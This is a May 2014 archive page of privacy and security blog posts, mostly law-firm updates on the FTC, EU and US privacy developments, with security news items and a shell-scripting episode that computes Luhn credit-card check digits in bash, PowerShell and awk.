Monthly Archives: May 2014

FTC Issues Report on Data Broker Industry, Recommends Legislation

On May 27, 2014, the Federal Trade Commission announced the release of a new report entitled Data Brokers: A Call for Transparency and Accountability, detailing the findings of an FTC study of nine data brokers, representing a cross-section of the industry. The Report concludes that the data broker industry needs greater transparency and recommends that Congress consider enacting legislation that would make data brokers’ practices more visible and give consumers more control over the collection and sharing of their personal information.

The Report finds that data brokers collect consumer data from both online and offline sources, storing billions of data elements pertaining to almost every U.S. consumer. In addition, the Report indicates that data brokers share data with each other, and they combine and analyze consumer data to make inferences, including potentially sensitive inferences, about consumers. The Report also notes that, to the extent data brokers currently offer consumers choices about their personal information, consumers may not be aware of those choices.

The FTC recommends that Congress enact legislation to address the lack of visibility into data broker practices, and to provide consumers with increased access and control. In recent years, several bills have been introduced to address these issues, but no federal legislation on the topic has been enacted to date.

The FTC Report takes a different approach from the recent White House data report, “Big Data: Seizing Opportunities, Preserving Values,” which was issued earlier in May. Whereas the White House report discusses both the benefits of data collection and its privacy implications, the FTC Report focuses more on potential harms to consumers. The FTC calls for writing into law concepts that have been part of voluntary industry codes of conduct for years.

As we previously reported, in September 2013, Senator Jay Rockefeller (D-WV), Chair of the Senate Committee on Commerce, Science and Transportation, sent letters to twelve popular health and personal finance websites as part of his investigation of the data broker industry. The letters asked the companies to answer questions about their data collection and sharing practices. As reported in Bloomberg BNA, Senator Rockefeller “concluded that the FTC report ‘echoes findings’ of his committee’s recent probe of the data broker industry.”

The FTC voted to approve the issuance of the report 4-0, with Commissioner Terrell McSweeny not participating. Commissioner Julie Brill issued a concurring statement.

Google to Give Effect to Right to Remove Personal Data from Search Results

On May 30, 2014, Google posted a web form that enables individuals to request the removal of URLs from the results of searches that include that individual’s name. The web form acknowledges that this is Google’s “initial effort” to give effect to the recent and controversial decision of the Court of Justice of the European Union in Costeja, widely described as providing a “right to be forgotten.” That Google has moved quickly to offer individuals a formal removal request process will be viewed favorably, but the practicalities of creating a removals process that satisfies all interested parties will remain challenging, and not just for Google.

In Costeja, the Court gave little practical guidance on how the removal request process should operate, beyond requiring search providers to examine whether the right of the individual to request the removal of a URL outweighs the public interest in having access to the information. Google’s web form asks requestors to verify their identity and provide the URL that they wish to see removed from Google’s search results, including details of the search terms used. Requestors must also explain how the search result is “irrelevant, outdated, or otherwise inappropriate.” In evaluating requests, Google is required to consider whether there is a public interest in the contested information remaining in the search results.

The expectations of individuals and data protection authorities (“DPAs”) across Europe as to how this balancing test should apply are likely to differ. From the perspective of individuals, widespread references to a “right to be forgotten” overstate the effect of the Court’s decision in Costeja and may have created unrealistic public expectation as to the practical effect of a successful removal request. Even if a removal request is successful, the URL is only removed from the results of searches that include the requestor’s name. The URL will continue to appear in the results of other searches. To achieve complete removal of the URL from the web, an individual would need to approach the webmaster of the relevant site. It seems inevitable that there will be a raft of complaints from disappointed requestors, and an increased workload for DPAs.

DPAs will be expected to provide guidance to search providers and to help educate individuals as to the scope of the removal right described in Costeja. The Article 29 Working Party, an advisory body composed of European DPAs, will be meeting in Brussels on June 3-4, 2014, where they will discuss the Costeja decision and identify guidelines for its implementation.

As Deputy Commissioner and Director of Data Protection of the UK Information Commissioner’s Office, David Smith, noted in a blog post this week, “[t]he judgment might mark the end of a lengthy legal process, but it marks the beginning in terms of how a decision in Luxembourg affects the man in the street…”

Disclosure: Google is a client of Hunton & Williams.

Hunton’s Global Privacy and Cybersecurity Practice Tops Chambers USA 2014 Rankings

Hunton & Williams LLP is pleased to announce that Chambers and Partners has listed the firm’s Global Privacy and Cybersecurity practice in Band 1 in the 2014 Chambers USA guide. This is the seventh consecutive year the firm has been top ranked in this category. In addition, Lisa Sotto, partner and chair of the firm’s Global Privacy and Cybersecurity practice group, again was recognized as a “Star” performer (the guide’s highest ranking) for privacy and data security.

Chambers USA noted that the firm has “[d]eep experience in the full spectrum of privacy work,” with clients emphasizing that “[t]heir partners are rock stars. They are deep in terms of their knowledge of the regulators and they have the relationships that drive this area of work. Hunton & Williams is top of its game.” The team provides global privacy and cybersecurity advice to leading global companies and other high-profile clients.

In addition, the firm was ranked in the top-tier Band 1 in the Chambers Global guide, including in the guide’s inaugural Europe-wide data protection section, and the Chambers UK and Chambers Europe guides for data protection.

Read the full press release.

Canadian Prime Minister Nominates Next Privacy Commissioner

On May 28, 2014, Canadian Prime Minister Stephen Harper nominated Daniel Therrien as the next Privacy Commissioner of Canada. If approved, Therrien would take over from the interim Privacy Commissioner Chantal Bernier, who has been serving in that role since the previous Commissioner Jennifer Stoddart’s term ended in December 2013.

Therrien is currently Assistant Deputy Attorney General of the Public Safety, Defence and Immigration Portfolio at the Department of Justice. His nomination must be approved by the Senate and House of Commons of Canada.

The Canadian Privacy Commissioner is responsible for overseeing compliance with both the Privacy Act and the Personal Information Protection and Electronic Documents Act (“PIPEDA”).

We’re moving and expanding!

This blog is moving (and expanding) to a full IT security news and views site: Latest news on ITsecurity. But that’s all folks. If you want to keep up with the latest news and views, hop over to ITsecurity! Two iPhone hackers probably behind the Oleg Pliss attacks arrested in Russia. CESG advice on […]

Hunton Global Privacy Update – May 2014

On May 14, 2014, Hunton & Williams’ Global Privacy and Cybersecurity practice group hosted the latest webcast in its Hunton Global Privacy Update series. The program provided a global overview of some of the most debated topics in data protection and privacy, including cross-border data flows, global data breach issues and the EU Cybersecurity Directive. In addition, we highlighted the latest information regarding the GPEN enforcement sweep.

Listen to a recording of the May 2014 Hunton Global Privacy Update.

Previous recordings of the Hunton Global Privacy Updates may be accessed under the Multimedia Resources section of our privacy blog.

Hunton Global Privacy Update sessions are 30 minutes in length and are scheduled to take place every two months. The next Privacy Update is slated for July 15, 2014.

House Passes Bill Limiting NSA Data Collection

On May 22, 2014, the United States House of Representatives passed H.R. 3361, a bill aimed at limiting the federal government’s ability to collect bulk phone records and increasing transparency regarding decisions by the Foreign Intelligence Surveillance Court (“FISC”). The bill was approved by a vote of 323-121, with majorities of both Democratic and Republican members of the House voting in favor. It now moves to the Senate where it is likely to pass.

The bill is designed to prohibit the bulk collection of telephone records by the National Security Agency, but if it becomes law, the federal government still would have access to individuals’ phone records. Such access would require the government to use a “specific selection term” to narrow its collection to phone records that are relevant to a particular investigation.

In addition, the bill would revise the procedures governing the FISC. The bill would require the FISC to appoint an individual with “privacy or civil liberties, intelligence collection, telecommunications” expertise to serve as amicus curiae, to assist the court with novel or significant interpretations of law. The bill also would require the government to determine whether it should declassify prior FISC opinions.

Finally, the bill extends certain provisions of the USA PATRIOT Act that are scheduled to expire in 2015.

Read H.R. 3361.

FTC Seeks Privacy Protection for Personal Information in Bankruptcy Proceeding

On May 23, 2014, the Federal Trade Commission announced that the FTC’s Bureau of Consumer Protection sent a letter to the court overseeing the bankruptcy proceedings for ConnectEDU Inc. (“ConnectEDU”), an education technology company, warning that the proposed sale of the company’s assets raises privacy concerns. ConnectEDU’s assets include personal information collected from students, high schools and community colleges in connection with the company’s website and affiliated services.

On its website, the company’s privacy policy states that “In the event of sale or intended sale of the Company, ConnectEDU will give users reasonable notice and an opportunity to remove personally identifiable data from the service.” In her letter to the court, Jessica Rich, Director of the Bureau of Consumer Protection, wrote, “We believe that any sale of the personal information of ConnectEDU’s customers would be inconsistent with ConnectEDU’s privacy policy, unless ConnectEDU provides those customers with notice and an opportunity to delete the information.” The FTC’s Bureau of Consumer Protection believes that a sale without reasonable notice to users and an opportunity to remove personal information would violate “the FTC’s prohibition against ‘deceptive acts or practices in or affecting commerce.’”

The letter states that these privacy concerns “would be greatly diminished” if ConnectEDU gives users “notice of the sale of their personal information and opportunity for its removal” or destroys the personal information. The court also could appoint a “privacy ombudsman to ensure that the privacy interests of ConnectEDU’s customers are protected.”

The FTC voted to approve the issuance of the letter 5-0.

Read the related post on the FTC’s Business Center Blog.

Virginia Governor McAuliffe Appoints Paul Tiao to Virginia Cyber Security Commission

On May 16, 2014, Virginia Governor Terry McAuliffe announced the members of the Virginia Cyber Security Commission, including the appointment of Hunton & Williams LLP’s Paul M. Tiao. Tiao, one of eleven citizen members appointed to the group, is a partner in the firm’s Global Privacy and Cybersecurity Practice Group.

“The cybersecurity issues facing both the Commonwealth and the nation are substantial,” said Tiao. “I’m honored to be selected to serve on the governor’s Commission. I look forward to having this opportunity to help the State and to work with the leaders on the Commission.”

The Commission, established by executive order on February 26, 2014, brings together public and private sector industry leaders from around the state, as well as McAuliffe Administration representatives, to offer recommendations on how to make Virginia a national leader in cybersecurity. Co-chaired by Secretary of Technology Karen Jackson and Chairman and CEO of Good Harbor Security Risk Management Richard Clarke, the group is slated to hold its inaugural meeting June 11.

Read the full press release.

More on the Avast breach and the hash used

My understanding is that the hash formula used by Avast to store its forum users’ passwords was $hash = sha1(strtolower($username) . $password); This is the formula built into the SMF open source forum software used by Avast. It is both good and bad. It confirms that the hash was salted (with the user’s username); but […]
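That SMF-style construction is easy to reproduce. Below is a minimal Python sketch of the same scheme (the function name and sample credentials are my own, for illustration): SHA-1 of the lowercased username concatenated with the password. It shows both points made above: the hash is salted per user, but the "salt" is predictable and public, and SHA-1 is fast to brute-force.

```python
import hashlib

def smf_hash(username: str, password: str) -> str:
    # SMF-style password hash: SHA-1 over lowercase(username) + password.
    # The username acts as a per-user salt, but it is known to any attacker
    # who obtains the database, and lowercasing shrinks the salt space further.
    return hashlib.sha1((username.lower() + password).encode("utf-8")).hexdigest()

# Because the username is lowercased, the salt is case-insensitive:
print(smf_hash("Alice", "hunter2") == smf_hash("alice", "hunter2"))  # True
```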

Avast forum hack demonstrates we need password storage disclosure

A blog post early this morning by Avast Software CEO Vince Steckler announced: “The AVAST forum is currently offline and will remain so for a brief period. It was hacked over this past weekend and user nicknames, user names, email addresses and hashed (one-way encrypted) passwords were compromised.” AVAST forum offline due to attack. Avast’s […]

Hector ‘Sabu’ Monsegur to be sentenced while Hammond sits in prison

A common cry in Anonymous circles is ‘Free Jeremy Hammond; Fuck Sabu’. Jeremy Hammond is currently serving a ten-year prison sentence for his involvement in the Stratfor hack. Sabu (real name Hector Xavier Monsegur) will be sentenced tomorrow for his role in Lulzsec and many other hacks. He is expected, on FBI request, to walk […]

Catching up on recent crypto developments

When I started this blog, the goal was to write long-form posts that could serve as a standalone intro to security and crypto topics. Rather than write about the history of the NSA as planned, I’ll try writing a few short notes in hopes that they’ll fit better within the time I have. (Running a company and then launching a new one over the past few years has limited my time.)

Heartbleed has to be the most useful SSL bug ever. It has launched not just one, but two separate rewrites of OpenSSL. I’m hoping it will also give the IETF more incentive to reject layering violations like the heartbeat extension. Security protocols are for security, not path MTU discovery.

Giving an attacker a way to ask you to say a specific phrase is never a good idea. Worse would be letting them tell you what to say under encryption.

Earlier this year, I was pleased to find out that a protocol I designed and implemented has been in use for millions (billions?) of transactions over the past few years. During design, I spent days slaving over field order and dependencies in order to force implementations to be as simple as possible. “Never supply the same information twice in a protocol” was the mantra, eliminating many length fields and relying on a version bump at the start of the messages if the format ever changed. Because I had to create a variant cipher mode, I spent 5x the initial design time scrutinizing the protocol for flaws, then paid a third party for a review.

As part of the implementation, I provided a full test harness and values covering all the valid and error paths. I also wrote a fuzzer and ran that for days over the final code to check for any possible variation in behavior, seeding it with the test cases. I encouraged the customer to integrate these tests into their release process to ensure changes to the surrounding code (e.g., 32/64 bit arch) didn’t break it. Finally, I helped with the key generation and production line design to be sure personalization would be secure too.

I firmly believe this kind of effort is required for creating security and crypto that is in widespread use. This shouldn’t be extraordinary, but it sadly seems to be so today. It was only through the commitment of my customer that we were able to spend so much effort on this project.

If you have the responsibility to create something protecting money or lives, I hope you’ll commit to doing the same.

Episode #178: Luhn-acy

Hal limbers up in the dojo

To maintain our fighting trim here in the Command Line Kung Fu dojo, we like to set little challenges for ourselves from time to time. Of course, we prefer it when our loyal readers send us ideas, so keep those emails coming! Really... please oh please oh please keep those emails coming... please, please, please... ahem, but I digress.

All of the data breaches in the news over the last year got me thinking about credit card numbers. As many of you are probably aware, credit card numbers have a check digit at the end to help validate the account number. The Luhn algorithm for computing this digit is moderately complicated and I wondered how much shell code it would take to compute these digits.
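As a point of reference (my own sketch, not part of the original challenge), the whole check-digit calculation is only a few lines of Python; the shell version built up below arrives at the same answer:

```python
def luhn_check_digit(payload: str) -> int:
    """Compute the Luhn check digit for a digit string (check digit not included)."""
    total = 0
    for i, ch in enumerate(reversed(payload)):
        d = int(ch)
        if i % 2 == 0:       # double every other digit, starting from the right
            d *= 2
            if d > 9:        # e.g., 16 -> 1 + 6 = 7, same as subtracting 9
                d -= 9
        total += d
    return (total * 9) % 10  # equivalent to (10 - total % 10) % 10

print(luhn_check_digit("12345678"))  # 2
```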

The Luhn algorithm is a right-to-left calculation, so it seemed like my first task was to peel off the last digit and be able to iterate across the remaining digits in reverse order:

$ for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do echo $d; done
8
7
6
5
4
3
2
1

The "rev" utility flips the order of our digits, and then we just grab everything from the second digit onwards with "cut". We use a little "sed" action to break the digits up into a list we can iterate over.

Then I started thinking about how to do the "doubling" calculation on every other digit. I could have set up a shell function to calculate the doubling each time, but with only 10 possible outcomes, it seemed easier to just create an array with the appropriate values:

$ doubles=(0 2 4 6 8 1 3 5 7 9)
$ for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do echo $d ${doubles[$d]}; done
8 7
7 5
6 3
5 1
4 8
3 6
2 4
1 2

Then I needed to output the "doubled" digit only every other digit, starting with the first from the right. That means a little modular arithmetic:

$ c=0
$ for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do
echo $(( ++c % 2 ? ${doubles[$d]} : $d ));
done
7
7
3
5
8
3
4
1


I've introduced a counting variable, "$c". Inside the loop, I'm evaluating a conditional expression to decide if I need to output the "double" of the digit or just the digit itself. There are several ways I could have handled this conditional operation in the shell, but having it in the mathematical "$((...))" construct is particularly useful when I want to calculate the total:

$ c=0; t=0
$ for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do
t=$(( $t + (++c % 2 ? ${doubles[$d]} : $d) ));
done

$ echo $t
38

We're basically done at this point. Instead of outputting the total, "$t", I need to do one more calculation to produce the Luhn digit:

$ c=0; t=0
$ for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do
t=$(( $t + (++c % 2 ? ${doubles[$d]} : $d) ));
done

$ echo $(( ($t * 9) % 10 ))
2
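The multiply-by-9 step may look like magic, but it is just a modular shortcut for the more familiar “subtract the total from the next multiple of ten” formulation: since 9 ≡ -1 (mod 10), multiplying by 9 negates the total mod 10. A quick check of the equivalence (my own aside, in Python for brevity):

```python
# (t * 9) % 10 equals the usual (10 - t % 10) % 10 check-digit formula,
# because 9 is congruent to -1 mod 10, so t*9 is congruent to -t mod 10.
for t in range(1000):
    assert (t * 9) % 10 == (10 - t % 10) % 10
print("equivalent")
```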

Here's the whole thing in one line of shell code, including the array definition:

doubles=(0 2 4 6 8 1 3 5 7 9);
c=0; t=0;
for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do
t=$(( $t + (++c % 2 ? ${doubles[$d]} : $d) ));
done;
echo $(( ($t * 9) % 10 ))

Even with all the extra whitespace, the whole thing fits in under 100 characters! Grand Master Ed would be proud.

I'm not even going to ask Tim to try and do this in CMD.EXE. Grand Master Ed could have handled it, but we'll let Tim use his PowerShell training wheels. I'm just wondering if he can do it so it still fits inside a Tweet...

Tim checks Hal's math

I'm not quite sure how Hal counts, but when I copy/paste and then use Hal's own wc command I get 195 characters. It is less than *2*00 characters, but too long to tweet.

Here is how we can accomplish the same task in PowerShell. I'm going to use a slightly different method than Hal. First, I'm going to use his lookup method, as it is more terse than doing the extra math via if/then. In addition, I am going to extend his method a little to save space.

PS C:\> $lookup = @((0..9),(0,2,4,6,8,1,3,5,7,9));

This multi-dimensional array contains a lookup for the number as well as the doubled number. That way I can index the value without an if statement, which saves space. Here is an example:

PS C:\> $isdoubled = $false
PS C:\> $lookup[$isdoubled][6]
6
PS C:\> $isdoubled = $true
PS C:\> $lookup[$isdoubled][7]
5

The shortest way to get each digit, from right to left, is by using a regex (regular expression) match working right to left. A longer way would be to take the string, convert it to a char array and then reverse it, but that is long, ugly, and needs an additional variable.

The results are fed into a ForEach-Object loop. Before the objects (the digits) passed down the pipeline are handled, we initialize a few variables in -Begin: the total and the boolean $isdoubled. Next, we add the digits up by accessing the items in our array and toggling the $isdoubled variable. Finally, we use ForEach-Object's -End to output the final value of $sum.

PS C:\> ([regex]::Matches('123456789','.','RightToLeft')) | ForEach-Object
-Begin { $sum = 0; $isdoubled = $false } -Process { $sum += $lookup[$isdoubled][[int]$_.value]; $isdoubled = -not $isdoubled }
-End { $sum }

We can shorten the command to this to save space.

PS C:\> $l=@((0..9),(0,2,4,6,8,1,3,5,7,9));
([regex]::Matches('123456789','.','RightToLeft')) | %{ $s+=$l[$d][$_.value];$d=!$d} -b{$s=0;$d=0} -en{$s}

According to my math this is exactly 140 characters. I could trim another 2 by removing a few spaces too. It's tweetable!

I'll even throw in a bonus version for cmd.exe:

C:\> powershell -command "$l=@((0..9),(0,2,4,6,8,1,3,5,7,9));
([regex]::Matches('123456789','.','RightToLeft')) | %{ $s+=$l[$d][$_.value];$d=!$d} -b{$s=0;$d=0} -en{$s}"

Ok, it is a bit of cheating, but it does run from CMD.

Hal gets a little help

I'm honestly not sure where my brain was at when I was counting characters in my solution. Shortening variable names and removing all extraneous whitespace, I can get my solution down to about 150 characters, but no smaller.

Happily, Tom Bonds wrote in with this cute little blob of awk which accomplishes the mission:

awk 'BEGIN{split("0246813579",d,""); for (i=split("12345678",a,"");i>0;i--) {t += ++x % 2 ? d[a[i]+1] : a[i];} print (t * 9) % 10}'

Here it is with a little more whitespace:

awk 'BEGIN{ split("0246813579",d,"");
for (i=split("12345678",a,"");i>0;i--) {
t += ++x % 2 ? d[a[i]+1] : a[i];
}
print (t * 9) % 10
}'

Tom's getting a lot of leverage out of the "split()" operator and using his "for" loop to count backwards down the string. awk automatically initializes his t and x variables to zero each time his program runs, whereas in the shell I have to explicitly set mine to zero or the values from the last run will be used.

Anyway, Tom's original version definitely fits in a tweet! Good show, Tom!

California Attorney General Releases Guidance on Recent Changes to CalOPPA

On May 21, 2014, California Attorney General Kamala D. Harris issued guidance for businesses (“Guidance”) on how to comply with recent updates to the California Online Privacy Protection Act (“CalOPPA”). The recent updates to CalOPPA include requirements that online privacy notices disclose how a site responds to “Do Not Track” signals, and whether third parties may collect personal information about consumers who use the site. In an accompanying press release, the Attorney General stated that the Guidance is intended to provide a “tool for businesses to create clear and transparent privacy policies that reflect the state’s privacy laws and allow consumers to make informed decisions.” The Guidance is not legally binding; it is intended to encourage companies to draft transparent online privacy notices.

The Guidance, Making Your Privacy Practices Public, recommends, among other items, that website operators’ online privacy notices should:

  • conspicuously identify the section of the notice that provides information on the site’s response to “Do Not Track” signals;
  • state whether third parties are collecting personally identifiable information;
  • explain uses of personally identifiable information beyond the uses necessary for fulfilling the basic functionality of the online service;
  • provide links to the privacy policies of third parties with whom the website operator shares personally identifiable information; and
  • describe the choices a consumer has with respect to the collection, use and distribution of his or her personal information.

The Guidance clarifies that describing how a website responds to a “Do Not Track” signal is preferable to merely linking to a “choice program” because a description of the site’s specific response provides greater transparency to consumers. In crafting this section of an online privacy notice, website operators should consider whether they (1) treat a visitor differently if his or her browser relays a “Do Not Track” signal, and (2) collect visitors’ personally identifiable information over time and across third-party websites. If website operators provide a link to a “choice program” rather than describing their sites’ particular response to a “Do Not Track” signal, the operators should ensure that (1) they comply with the “choice program,” and (2) the link to the “choice program” describes the program’s effects on the consumer and how the consumer can exercise the choice offered by the program.

Read the full version of the guidance.

FCC Reaches Settlement Over Alleged Do-Not-Call Registry Violations

On May 19, 2014, the Federal Communications Commission announced that Sprint Corporation agreed to pay $7.5 million to settle an FCC Enforcement Bureau investigation stemming from allegations that the company failed to honor consumers’ requests to opt out of telemarketing calls and texts. Sprint also agreed to implement a two-year plan to help ensure future compliance with Do-Not-Call registry rules.

The terms of the FCC’s Consent Decree require the company to:

  • develop a compliance plan designed to help ensure future compliance with the FCC’s rules requiring companies to maintain internal Do-Not-Call lists and honor consumers’ requests;
  • designate a Compliance Officer; and
  • implement a training program for employees and contractors on recording Do-Not-Call requests so that the company removes those customers’ names and numbers from marketing lists.

The National Do-Not-Call Registry was established in 2003. Consumers may register their phone numbers to opt out of receiving most telemarketing calls.

EU Court of Justice Upholds Right to Erasure in Google Search Case

On May 13, 2014, the European Court of Justice (the “ECJ”) rendered its judgment in Google Spain S.L. and Google Inc. v Agencia Española de Protección de Datos (Case C-131/12, “Google v. AEPD” or the “case”). The case concerns a request made by a Spanish individual, Mr. Costeja, to the Spanish Data Protection Authority (Agencia Española de Protección de Datos or “AEPD”) to order the removal of certain links from Google’s search results. The links relate to an announcement in an online newspaper of a real estate auction for the recovery of Mr. Costeja’s social security debts. The information was lawfully published in 1998, but Mr. Costeja argued that the information had become irrelevant as the proceedings concerning him had been fully resolved for a number of years. The AEPD upheld the complaint and ordered Google Spain S.L. and Google Inc. (“Google”) to remove the links from their search results. Google appealed this decision before the Spanish High Court, which referred a series of questions to the ECJ for a preliminary ruling. The ECJ ruled as follows:

  • The actions of search engine operators, in automatically collecting information from the Internet, storing and indexing that information, and displaying that information in search results, constitute “processing” of personal data within the meaning of the EU Data Protection Directive 95/46/EC (the “Directive”). The search engine operator is a “data controller,” within the meaning of the Directive, with respect to such processing.
  • Where (1) a search engine operator located outside the EU has subsidiaries in one or more EU Member States, (2) those subsidiaries promote and sell advertising space offered by that search engine, and (3) the search engine directs its activities towards the inhabitants of those Member States (e.g., by providing a website with a local top-level domain and local language customizations), then that search engine operator is treated as being “established” in those EU Member States (within the meaning of Article 4(1)(a) of the Directive).
  • The ECJ therefore considers that, although Google Inc. is a company registered in California, it is a data controller with respect to its search services and is “established” in Spain “in the context of the activities” of Google Spain, because Google Spain promotes and sells advertising services that are integrated into Google Search results, and such advertising is served on Google’s Spanish website.
  • At the request of any individual, a search engine operator is required to consider, on a case-by-case basis, whether information that relates to that individual personally should no longer be displayed in the results of a search made on the basis of the individual’s name, particularly if the information is inadequate, irrelevant or excessive in relation to the purposes for which the information is processed. This consideration should take into account all of the circumstances of the case, including the individual’s rights under Articles 7 (respect for private and family life) and 8 (protection of personal data) of the Charter of Fundamental Rights of the European Union.
  • If, given the circumstances, the information is inadequate, irrelevant or excessive, then the search engine operator is obligated to remove, from the list of results displayed following a search made on the basis of that individual’s name, links to third party web pages containing that information (even when the original publication of the information on those third party web pages is lawful), unless there are particular reasons (such as the individual’s role in public life) that justify an overriding interest of the general public in having access to that information.

Singapore Personal Data Protection Commission Publishes Two Advisory Guidelines and Anticipates Promulgation of PDPA Regulations

On May 16, 2014, the Singapore Personal Data Protection Commission (the “Commission”) published advisory guidelines for the implementation of its Personal Data Protection Act (the “PDPA”) for two industry sectors. The guidelines were published on the same day on which the Commission held its well-attended Personal Data Protection Seminar focusing on international perspectives on data governance. The advisory guidelines generally have the following content:

  • The Advisory Guidelines for the Telecommunications Sector were developed in consultation with the Info-communications Development Authority of Singapore. They address issues and circumstances that may apply to enterprises in the telecommunications sector when they seek to comply with the PDPA. The guidelines discuss, for example, whether telephone numbers constitute personal data and in what circumstances an Internet protocol address or international mobile equipment identity number may constitute personal data.
  • The Advisory Guidelines for the Real Estate Agency Sector were developed in consultation with the Council for Estate Agencies. They address circumstances that real estate agencies may face in complying with the PDPA. The guidelines discuss the use of anonymized and aggregated personal data and business contact information.

The publication of these two advisory guidelines illustrates the overall structure under which Singapore will implement its PDPA. In general, the PDPA functions as the baseline framework data protection law, with regulations, guidelines and rules applicable to particular industry sectors or topics published and applied on a sector-by-sector (or topic-by-topic) basis. The publication of these guidelines also illustrates the seriousness and focus with which Singapore and its Commission are preparing for the entry into force and implementation of the PDPA.

More advisory guidelines can be expected in the near future for the educational, health care and social service sectors, as well as for the specific topic of photography. Perhaps most significantly at this time, on May 16, 2014, the Commission also published a note announcing the closing of its public consultation for the PDPA regulations. Based on this note, it appears that when those regulations are formally promulgated, they will include significant provisions on how entities may properly effect a cross-border data transfer from Singapore, as well as provisions expounding on access and correction rights. The cross-border transfer restrictions likely will require the transferor to take appropriate steps (which may not necessarily be contractual) to ensure that the data will receive the same level of protection in their destination country as would have applied in Singapore. The restrictions, however, would allow transfers made with the consent of the data subject, or transfers made for the purpose of performing a contract made with the data subject, to proceed more readily.

The promulgation of the PDPA regulations may be the next significant step in the implementation of the PDPA. We will promptly report on that development when it occurs.

The personal data protection provisions of the PDPA come into effect on July 2, 2014.

Read our previous coverage on the Commission’s efforts regarding the PDPA.

French Data Protection Authority Unveils 2013 Annual Activity Report

On May 19, 2014, the French Data Protection Authority (the “CNIL”) published its Annual Activity Report for 2013 (the “Report”) highlighting its main accomplishments in 2013 and outlining some of its priorities for the upcoming year.

The Report discusses the proposed EU General Data Protection Regulation, and reiterates the CNIL’s main concerns with the proposal, namely:

  • The one-stop-shop mechanism: according to the CNIL, the mechanism must provide better protection for individuals and allow for oversight by the data protection authority of the EU Member State where the individuals reside;
  • Pseudonymous data: in the CNIL’s view, pseudonymous data should not benefit from a specific derogatory regime; and
  • The risk-based approach: the approach should not exempt the data controller from its general obligation to comply with the Regulation.

The Report further discusses the French government’s proposed new Digital Act, which was announced in February 2013. The Report includes several recommendations for French lawmakers to consider, such as allowing individuals to request access to their personal data electronically, and increasing the CNIL’s maximum fines.

The following are some of the other highlights from the Report:

  • In 2013, the CNIL received 5,640 complaints (slightly down from 2012). 34% of these complaints concerned the Internet/telecoms sector and related to issues such as requests to erase texts, photographs, videos, contact details and comments from the Internet; 19% of the complaints focused on issues such as the right to object to receiving marketing emails and the retention of banking data.
  • In 2013, the CNIL conducted 414 inspections. More than 130 of these inspections were related to video surveillance systems (CCTV systems). In most cases, the CCTV systems were composed of several CCTV cameras, some of which captured images of public areas (and thus are regulated by the French Code of Internal Security), while other CCTV cameras captured sites not open to the public (and thus are subject to the French Data Protection Act). According to the Report, the main infringements were related to (1) failure to notify the CNIL of the CCTV system or obtain authorization from the appropriate authorities; (2) a lack of information or insufficient information to individuals; (3) retaining personal data for a longer period than authorized by the prefect or recommended by the CNIL; and (4) failure to implement adequate security measures.
  • Since 2011, the CNIL has received 31 data security breach notifications (15 in 2013 and 2 in 2014). The CNIL has already served 10 formal notices and adopted 8 sanctions related to these breaches. The Report reiterates that the CNIL’s inspections in 2014 will focus on how telecommunications service providers manage data security breaches.

Read the CNIL’s full report.

Sotto Speaks on the Importance of Cross-Border Data Transfers to Global Prosperity

Hunton & Williams LLP, in coordination with the U.S. Chamber of Commerce, recently issued a report entitled Business Without Borders: The Importance of Cross-Border Data Transfers to Global Prosperity, highlighting the benefits of cross-border data transfers to businesses in the international marketplace. The report underscores the importance of developing data transfer mechanisms that protect privacy and facilitate the free-flow of data, and also explores opportunities for new data transfer regimes.


On May 20 and 21, 2014, lead Hunton & Williams author Lisa J. Sotto, head of the Global Privacy and Cybersecurity practice, is introducing the report at a two-day workshop in Jakarta, Indonesia, “A Digital Trade and Cross-Border Data Flows Conference: Unleashing Indonesia’s Digital Economy and Innovation Sector.” The workshop, which is being hosted by AmCham Indonesia and the U.S. Chamber of Commerce, in coordination with local Indonesian associations, focuses on digital trade and provides a platform for companies to discuss the policies necessary to ensure success in the Information Age. Sotto is addressing the degree to which today’s businesses rely on cross-border data flows and digital commerce.

Bridget Treacy, head of the UK Privacy and Cybersecurity practice at Hunton & Williams, coauthored the paper which recommends movement away from rigid, one-size-fits-all cross-border data transfer rules toward more outcome-focused frameworks. The report advocates implementing strong, binding trade agreement commitments that prohibit data localization requirements, support unimpeded data flows, and encourage interoperability among privacy regimes.

Read the full press release.

FBI indicts five members of the Chinese military for hacking US companies

Eric Holder yesterday announced: “Today, we are announcing an indictment against five officers of the Chinese People’s Liberation Army for serious cybersecurity breaches against six American victim entities.” The five officers are known by the aliases UglyGorilla, Jack Sun, Lao Wen, hzy_1hx and KandyGoo. They are members of the PLA’s military unit 61398 (you may […]

Worldwide crackdown on BlackShades RAT users

First official indications emerged last Wednesday at the Reuters Cybersecurity Summit (although there have been rumblings in hacker circles for a couple of weeks now). FBI executive assistant director Robert Anderson, appointed in March to oversee ‘all FBI criminal and cyber investigations worldwide, international operations, critical incident response, and victim assistance’, announced: […]

FTC Approves Consent Orders with Companies that Marketed Genetically Customized Nutritional Supplements

On May 12, 2014, the Federal Trade Commission announced that it has approved final consent orders with two companies that marketed genetically customized nutritional supplements. In addition to charging that the companies’ claims regarding the effectiveness of their products were not sufficiently substantiated, the FTC’s complaints also allege that the companies misrepresented their privacy and security practices. The two companies, Gene Link, Inc. (“Gene Link”) and foru™ International Corp. (“foru” – a former subsidiary of Gene Link), represented in their privacy policy that they had “taken every precaution to create a process that allows individuals to maintain the highest level of privacy” and that the companies’ third party service providers are “contractually obligated to maintain the confidentiality and security of the Personal Customer Information and are restricted from using such information in any way not expressly authorized” by the companies.

According to the FTC’s complaints against Gene Link and foru, the companies failed to provide appropriate security measures to protect consumers’ personal information by:

  • Not requiring service providers by contract to implement reasonable safeguards and not engaging in reasonable oversight of those service providers;
  • Maintaining consumers’ personal information, including Social Security numbers and bank account numbers, in clear text;
  • Enabling service providers to access consumers’ complete personal information, even if such information was not necessary for service providers to perform their duties; and
  • Neglecting to limit wireless access to their network.

The consent orders with Gene Link and foru prohibit the companies from misrepresenting the extent to which the companies maintain the privacy, security and confidentiality of consumers’ personal information. The consent orders also obligate the companies to implement comprehensive information security programs that are subject to independent assessment on a biennial basis for the next 20 years.

EEOC Suffers Another Loss in Its Crusade Against Employer Background Checks

As reported in the Hunton Employment & Labor Perspectives Blog:

